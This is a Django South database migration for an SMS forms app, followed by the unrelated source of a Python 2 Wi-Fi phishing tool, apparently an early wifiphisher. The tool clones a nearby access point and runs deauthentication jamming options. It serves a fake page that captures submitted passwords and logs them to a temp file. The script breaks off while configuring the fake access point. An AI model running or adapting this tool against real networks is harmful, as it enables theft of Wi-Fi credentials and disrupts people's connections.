# Adding model 'BinaryValue'
db.create_table('rapidsms_xforms_binaryvalue', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('binary', self.gf('django.db.models.fields.files.FileField')(max_length=100)),
))
db.send_create_signal('rapidsms_xforms', ['BinaryValue'])
def backwards(self, orm):
# Deleting model 'XForm'
db.delete_table('rapidsms_xforms_xform')
# Removing M2M table for field restrict_to on 'XForm'
db.delete_table('rapidsms_xforms_xform_restrict_to')
# Deleting model 'XFormField'
db.delete_table('rapidsms_xforms_xformfield')
# Deleting model 'XFormFieldConstraint'
db.delete_table('rapidsms_xforms_xformfieldconstraint')
# Deleting model 'XFormSubmission'
db.delete_table('rapidsms_xforms_xformsubmission')
# Deleting model 'XFormSubmissionValue'
db.delete_table('rapidsms_xforms_xformsubmissionvalue')
# Deleting model 'BinaryValue'
db.delete_table('rapidsms_xforms_binaryvalue')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'eav.attribute': {
'Meta': {'ordering': "['name']", 'unique_together': "(('site', 'slug'),)", 'object_name': 'Attribute'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'datatype': ('eav.fields.EavDatatypeField', [], {'max_length': '6'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'enum_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eav.EnumGroup']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('eav.fields.EavSlugField', [], {'max_length': '50', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'})
},
'eav.enumgroup': {
'Meta': {'object_name': 'EnumGroup'},
'enums': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['eav.EnumValue']", 'symmetrical': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
'eav.enumvalue': {
'Meta': {'object_name': 'EnumValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'eav.value': {
'Meta': {'object_name': 'Value'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['eav.Attribute']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'entity_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'value_entities'", 'to': "orm['contenttypes.ContentType']"}),
'entity_id': ('django.db.models.fields.IntegerField', [], {}),
'generic_value_ct': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'value_values'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'generic_value_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value_bool': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'value_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'value_enum': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'eav_values'", 'null': 'True', 'to': "orm['eav.EnumValue']"}),
'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'value_int': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'value_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'locations.location': {
'Meta': {'object_name': 'Location'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'parent_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'point': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['locations.Point']", 'null': 'True', 'blank': 'True'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['locations.Location']"}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'locations'", 'null': 'True', 'to': "orm['locations.LocationType']"})
},
'locations.locationtype': {
'Meta': {'object_name': 'LocationType'},
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'primary_key': 'True', 'db_index': 'True'})
},
'locations.point': {
'Meta': {'object_name': 'Point'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'max_digits': '13', 'decimal_places': '10'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'max_digits': '13', 'decimal_places': '10'})
},
'logistics.contactrole': {
'Meta': {'object_name': 'ContactRole'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'responsibilities': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['logistics.Responsibility']", 'null': 'True', 'blank': 'True'})
},
'logistics.product': {
'Meta': {'object_name': 'Product'},
'average_monthly_consumption': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'emergency_order_level': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'equivalents': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'equivalents_rel_+'", 'null': 'True', 'to': "orm['logistics.Product']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'product_code': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'sms_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.ProductType']"}),
'units': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'logistics.producttype': {
'Meta': {'object_name': 'ProductType'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'logistics.responsibility': {
'Meta': {'object_name': 'Responsibility'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
'logistics.supplypoint': {
'Meta': {'object_name': 'SupplyPoint'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_reported': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['locations.Location']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'supplied_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.SupplyPoint']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.SupplyPointType']"})
},
'logistics.supplypointtype': {
'Meta': {'object_name': 'SupplyPointType'},
'code': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'primary_key': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'rapidsms.backend': {
'Meta': {'object_name': 'Backend'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20'})
},
'rapidsms.connection': {
'Meta': {'unique_together': "(('backend', 'identity'),)", 'object_name': 'Connection'},
'backend': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['rapidsms.Backend']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identity': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'rapidsms.contact': {
'Meta': {'object_name': 'Contact'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'birthdate': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'commodities': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'reported_by'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['logistics.Product']"}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_approved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '6', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'needs_reminders': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'reporting_location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['locations.Location']", 'null': 'True', 'blank': 'True'}),
'role': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.ContactRole']", 'null': 'True', 'blank': 'True'}),
'supply_point': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['logistics.SupplyPoint']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'contact'", 'unique': 'True', 'null': 'True', 'to': "orm['auth.User']"}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'village': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'villagers'", 'null': 'True', 'to': "orm['locations.Location']"}),
'village_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'rapidsms_httprouter.message': {
'Meta': {'object_name': 'Message'},
'application': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'batch': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messages'", 'null': 'True', 'to': "orm['rapidsms_httprouter.MessageBatch']"}),
'connection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'messages'", 'to': "orm['rapidsms.Connection']"}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'direction': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_response_to': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responses'", 'null': 'True', 'to': "orm['rapidsms_httprouter.Message']"}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '10'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'text': ('django.db.models.fields.TextField', [], {})
},
'rapidsms_httprouter.messagebatch': {
'Meta': {'object_name': 'MessageBatch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'rapidsms_xforms.binaryvalue': {
'Meta': {'object_name': 'BinaryValue'},
'binary': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'rapidsms_xforms.xform': {
'Meta': {'object_name': 'XForm'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'command_prefix': ('django.db.models.fields.CharField', [], {'default': "'+'", 'max_length': '1', 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('eav.fields.EavSlugField', [], {'max_length': '32', 'db_index': 'True'}),
'keyword_prefix': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'response': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'restrict_message': ('django.db.models.fields.CharField', [], {'max_length': '160', 'null': 'True', 'blank': 'True'}),
'restrict_to': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
'separator': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"})
},
'rapidsms_xforms.xformfield': {
'Meta': {'ordering': "('order', 'id')", 'object_name': 'XFormField', '_ormbases': ['eav.Attribute']},
'attribute_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['eav.Attribute']", 'unique': 'True', 'primary_key': 'True'}),
'command': ('eav.fields.EavSlugField', [], {'max_length': '32', 'db_index': 'True'}),
'field_type': ('django.db.models.fields.SlugField', [], {'db_index': 'True', 'max_length': '8', 'null': 'True', 'blank': 'True'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'xform': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fields'", 'to': "orm['rapidsms_xforms.XForm']"})
},
'rapidsms_xforms.xformfieldconstraint': {
'Meta': {'object_name': 'XFormFieldConstraint'},
'field': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'constraints'", 'to': "orm['rapidsms_xforms.XFormField']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '160'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '1000'}),
'test': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
'rapidsms_xforms.xformsubmission': {
'Meta': {'object_name': 'XFormSubmission'},
'confirmation_id': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'connection': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'submissions'", 'null': 'True', 'to': "orm['rapidsms.Connection']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'has_errors': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'submissions'", 'null': 'True', 'to': "orm['rapidsms_httprouter.Message']"}),
'raw': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'xform': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'submissions'", 'to': "orm['rapidsms_xforms.XForm']"})
},
'rapidsms_xforms.xformsubmissionvalue': {
'Meta': {'object_name': 'XFormSubmissionValue', '_ormbases': ['eav.Value']},
'submission': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'values'", 'to': "orm['rapidsms_xforms.XFormSubmission']"}),
'value_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['eav.Value']", 'unique': 'True', 'primary_key': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['rapidsms_xforms']
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import os
import ssl
import re
import time
import sys
import SimpleHTTPServer
import BaseHTTPServer
import ConfigParser
import httplib
import SocketServer
import cgi
import string
import argparse
import fcntl
from threading import Thread, Lock
from subprocess import Popen, PIPE, check_output
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
# Basic configuration
PORT = 8080
SSL_PORT = 443
PEM = 'cert/server.pem'
PHISING_PAGE = "access-point-pages/minimal"
DN = open(os.devnull, 'w')
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
count = 0 # for channel hopping Thread
APs = {} # for listing APs
hop_daemon_running = True
lock = Lock()
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--channel", help="Choose the channel for monitoring. Default is channel 1", default="1")
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-jI", "--jamminginterface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -jI mon5")
parser.add_argument("-aI", "--apinterface", help="Choose monitor mode interface. By default script will find the second most powerful interface and starts monitor mode on it. Example: -aI mon5")
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
parser.add_argument("-a", "--accesspoint", help="Enter the MAC address of a specific access point to target")
return parser.parse_args()
class SecureHTTPServer(BaseHTTPServer.HTTPServer):
"""
Simple HTTP server that extends the SimpleHTTPServer standard
module to support the SSL protocol.
Only the server is authenticated while the client remains
unauthenticated (i.e. the server will not request a client
certificate).
It also reacts to self.stop flag.
"""
def __init__(self, server_address, HandlerClass):
SocketServer.BaseServer.__init__(self, server_address, HandlerClass)
fpem = PEM
self.socket = ssl.SSLSocket(
socket.socket(self.address_family, self.socket_type),
keyfile=fpem,
certfile=fpem
)
self.server_bind()
self.server_activate()
def serve_forever(self):
"""
Handles one request at a time until stopped.
"""
self.stop = False
while not self.stop:
self.handle_request()
class SecureHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""
Request handler for the HTTPS server. It responds to
everything with a 301 redirection to the HTTP server.
"""
def do_QUIT(self):
"""
Sends a 200 OK response, and sets server.stop to True
"""
self.send_response(200)
self.end_headers()
self.server.stop = True
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
def do_GET(self):
self.send_response(301)
self.send_header('Location', 'http://10.0.0.1:' + str(PORT))
self.end_headers()
def log_message(self, format, *args):
return
class HTTPServer(BaseHTTPServer.HTTPServer):
"""
HTTP server that reacts to self.stop flag.
"""
def serve_forever(self):
"""
Handle one request at a time until stopped.
"""
self.stop = False
while not self.stop:
self.handle_request()
class HTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""
Request handler for the HTTP server that logs POST requests.
"""
def do_QUIT(self):
"""
Sends a 200 OK response, and sets server.stop to True
"""
self.send_response(200)
self.end_headers()
self.server.stop = True
def do_GET(self):
if self.path == "/":
with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
log_file.write('[' + T + '*' + W + '] ' + O + "GET " + T +
self.client_address[0] + W + "\n"
)
log_file.close()
self.path = "index.html"
self.path = "%s/%s" % (PHISING_PAGE, self.path)
if self.path.endswith(".html"):
if not os.path.isfile(self.path):
self.send_response(404)
return
f = open(self.path)
self.send_response(200)
self.send_header('Content-type', 'text-html')
self.end_headers()
# Send file content to client
self.wfile.write(f.read())
f.close()
return
# Leave binary and other data to default handler.
else:
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
})
for item in form.list:
if item.value:
if re.match("\A[\x20-\x7e]+\Z", item.value):
self.send_response(301)
self.send_header('Location', '/upgrading.html')
self.end_headers()
with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
log_file.write('[' + T + '*' + W + '] ' + O + "POST " +
T + self.client_address[0] +
R + " password=" + item.value +
W + "\n"
)
log_file.close()
return
def log_message(self, format, *args):
return
def stop_server(port=PORT, ssl_port=SSL_PORT):
"""
Sends QUIT request to HTTP server running on localhost:<port>
"""
conn = httplib.HTTPConnection("localhost:%d" % port)
conn.request("QUIT", "/")
conn.getresponse()
conn = httplib.HTTPSConnection("localhost:%d" % ssl_port)
conn.request("QUIT", "/")
conn.getresponse()
def shutdown():
"""
Shutdowns program.
"""
os.system('iptables -F')
os.system('iptables -X')
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
os.system('pkill airbase-ng')
os.system('pkill dnsmasq')
os.system('pkill hostapd')
if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
os.remove('/tmp/wifiphisher-webserver.tmp')
if os.path.isfile('/tmp/wifiphisher-jammer.tmp'):
os.remove('/tmp/wifiphisher-jammer.tmp')
if os.path.isfile('/tmp/hostapd.conf'):
os.remove('/tmp/hostapd.conf')
reset_interfaces()
print '\n[' + R + '!' + W + '] Closing'
sys.exit(0)
def get_interfaces():
interfaces = {"monitor": [], "managed": [], "all": []}
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
interfaces["monitor"].append(iface)
elif 'IEEE 802.11' in line:
interfaces["managed"].append(iface)
interfaces["all"].append(iface)
return interfaces
def get_iface(mode="all", exceptions=["_wifi"]):
ifaces = get_interfaces()[mode]
for i in ifaces:
if i not in exceptions:
return i
return False
def reset_interfaces():
monitors = get_interfaces()["monitor"]
for m in monitors:
if 'mon' in m:
Popen(['airmon-ng', 'stop', m], stdout=DN, stderr=DN)
else:
Popen(['ifconfig', m, 'down'], stdout=DN, stderr=DN)
Popen(['iwconfig', m, 'mode', 'managed'], stdout=DN, stderr=DN)
Popen(['ifconfig', m, 'up'], stdout=DN, stderr=DN)
def get_internet_interface():
'''return the wifi internet connected iface'''
inet_iface = None
proc = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
def_route = proc.communicate()[0].split('\n')#[0].split()
for line in def_route:
if 'wlan' in line and 'default via' in line:
line = line.split()
inet_iface = line[4]
ipprefix = line[2][:2] # Just checking if it's 192, 172, or 10
return inet_iface
return False
def get_internet_ip_prefix():
'''return the wifi internet connected IP prefix'''
ipprefix = None
proc = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
def_route = proc.communicate()[0].split('\n')#[0].split()
for line in def_route:
if 'wlan' in line and 'default via' in line:
line = line.split()
inet_iface = line[4]
ipprefix = line[2][:2] # Just checking if it's 192, 172, or 10
return ipprefix
return False
def channel_hop(mon_iface):
chan = 0
err = None
while hop_daemon_running:
try:
err = None
if chan > 11:
chan = 0
chan = chan+1
channel = str(chan)
iw = Popen(['iw', 'dev', mon_iface, 'set', 'channel', channel], stdout=DN, stderr=PIPE)
for line in iw.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
with lock:
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W+'\n \
Try disconnecting the monitor mode\'s parent interface (e.g. wlan0)\n \
from the network if you have not already\n'
break
time.sleep(1)
except KeyboardInterrupt:
sys.exit()
def sniffing(interface, cb):
'''This exists for if/when I get deauth working
so that it's easy to call sniff() in a thread'''
sniff(iface=interface, prn=cb, store=0)
def targeting_cb(pkt):
global APs, count
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
try:
ap_channel = str(ord(pkt[Dot11Elt:3].info))
except Exception:
return
essid = pkt[Dot11Elt].info
mac = pkt[Dot11].addr2
if len(APs) > 0:
for num in APs:
if essid in APs[num][1]:
return
count += 1
APs[count] = [ap_channel, essid, mac]
target_APs()
def target_APs():
global APs, count
os.system('clear')
print '['+G+'+'+W+'] Ctrl-C at any time to copy an access point from below'
print 'num ch ESSID'
print '---------------'
for ap in APs:
print G+str(ap).ljust(2)+W+' - '+APs[ap][0].ljust(2)+' - '+T+APs[ap][1]+W
def copy_AP():
global APs, count
copy = None
while not copy:
try:
copy = raw_input('\n['+G+'+'+W+'] Choose the ['+G+'num'+W+'] of the AP you wish to copy: ')
copy = int(copy)
except Exception:
copy = None
continue
channel = APs[copy][0]
essid = APs[copy][1]
if str(essid) == "\x00":
essid = ' '
mac = APs[copy][2]
return channel, essid, mac
def start_ap(mon_iface, channel, essid, args):
print '['+T+'*'+W+'] Starting the fake access point...'
config = ('interface=%s\n'
'driver=nl80211\n'
'ssid=%s\n'
'hw_mode=g\n'
'channel=%s\n'
'macaddr_acl=0\n'
'ignore_broadcast_ssid=0\n'
)
